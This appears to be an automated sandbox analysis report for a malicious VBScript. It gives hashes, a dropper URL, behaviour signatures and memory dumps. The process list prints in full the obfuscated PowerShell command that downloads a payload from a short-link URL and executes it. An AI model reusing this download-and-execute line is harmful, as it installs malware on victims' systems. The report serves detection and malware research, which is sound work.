Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    04-03-2022 19:23

General

  • Target

    ANVJYRGCEHLJVEQHRRQKR.vbs

  • Size

    5KB

  • MD5

    b8e6f98016f0cbb8ab5b6d8699538648

  • SHA1

    fd72b20ec5ecf894454f319808582b43b769df05

  • SHA256

    9841a5ee76188c7c50f2438e125fa6d60416704e7d40885571491cec4729dd90

  • SHA512

    c67f7254b27a61e1a674e64f7aab56c1ee0aaeebcfe451343d8375e687516bfad6e9d002039d446b5955c28a13a46741ba00d72a5f25de9c2dc32e76f769d6f3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rebrand.ly/rlzgijk

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ANVJYRGCEHLJVEQHRRQKR.vbs"
      PID:1512
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $Hx = 'https://rebrand.ly/rlzgijk'; iex (( (20, 22,20,24 ,28, 20, 73, 65, 54, '2d',69, 74, 45 ,'6d' ,20 ,27, 76 ,41 , 52 ,69 ,41 , 62 , '6c' , 65 , '3a','4f',66,53, 27,20, 20,27 , 27,20, 29 , 20 , 22 , '2b' , 20 , '5b' ,53 , 54,52,49 , '6e' , 47 ,'5d' , 28 ,27 ,34 , 39,67, 34 , 35 ,69 , 35 , 38 , '4b', 32, 38, '4b', 34 , 65 , 40 ,36, 35 , 67 ,37 ,37 , 69, 32 ,64 ,52,34, 66,'4b', 36, 32,53 , 36, 61 , '7d' , 36 ,35,67, 36,33 , 52,37 ,34 ,'5f' , 32,30 ,67,34 , 65 ,53,36 , 35 , 67 ,37, 34 , 53,32 ,65 , '7d', 35 ,37 , '4b', 36 ,35 , '5f' , 36 ,32, 52,34,33 ,67 ,36,63 , '4b',36 , 39 , 53, 36 , 35 ,69,36 , 65, 67 , 37,34, 53 , 32, 39 ,67 , 32, 65 ,67,34,34, 40 , 36, 66,53 , 37 , 37 , 40,36 ,65, '5f' ,36, 63 ,53 , 36,66,69, 36 , 31, '4b' , 36 , 34 ,40, 35 , 33 , '4b' , 37 ,34 , 67,37,32, 69 , 36, 39, 67 ,36,65 , '7d',36, 37 ,'7d' ,32 ,38,'5f' ,32,34 ,'7d' , 34,38,40 ,37 ,38, '7d' ,32,39 , 27, '2e', 53 ,50 ,'4c',49 ,54,28 ,27 ,'7d' , '4b', 67 , 69,40, '5f' , 52 , 53 , 27, 29 ,20 ,'7c' ,20, 25 ,'7b',20, 28, 20 , '5b' ,43, 68 , 61, 52 ,'5d' ,20, 28,'5b',43, '6f' , '6e' , 76, 65 ,72 ,54 , '5d' , '3a' , '3a', 74,'4f' , 49 ,'6e' , 54 , 31 ,36 ,28,28 ,20 , '5b' ,53 , 74,72, 69, '4e' ,47, '5d' ,24 , '5f',29, '2c' ,31,36 , 29, 20,29, 29 ,'7d' , 20 ,29,20 , '2b',22 , 24 , 28,73 ,45, 54,'2d', 49,74 , 65 ,'4d' , 20 ,20, 27, 56 ,61, 52,69 , 61, 42,'4c' ,65,'3a','6f', 46,53,27 ,20 , 27 ,20,27, 20 , 29 , 20 ,22 ,20, '7c', 26, 20 , 28 , 20, 24 , 50, 73 , 48, '6f','6d', 65, '5b' ,32 ,31,'5d' , '2b', 24, 70,53 ,48,'6f' , '4d' , 65 , '5b' ,33 ,30 , '5d' ,'2b',27, 78, 27 ,29)|forEAch-objEcT {([ConveRT]::toint16( ([stRinG]$_ ) ,16 )-AS[cHar])} ) -joIN '' )
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:384

    Downloads

    • memory/384-54-0x000007FEFB531000-0x000007FEFB533000-memory.dmp
      Filesize

      8KB

    • memory/384-55-0x000007FEF2720000-0x000007FEF327D000-memory.dmp
      Filesize

      11.4MB

    • memory/384-56-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp
      Filesize

      9.6MB

    • memory/384-57-0x00000000028C0000-0x00000000028C2000-memory.dmp
      Filesize

      8KB

    • memory/384-58-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp
      Filesize

      9.6MB

    • memory/384-59-0x00000000028CB000-0x00000000028EA000-memory.dmp
      Filesize

      124KB

    • memory/384-60-0x00000000028C2000-0x00000000028C4000-memory.dmp
      Filesize

      8KB

    • memory/384-61-0x00000000028C4000-0x00000000028C7000-memory.dmp
      Filesize

      12KB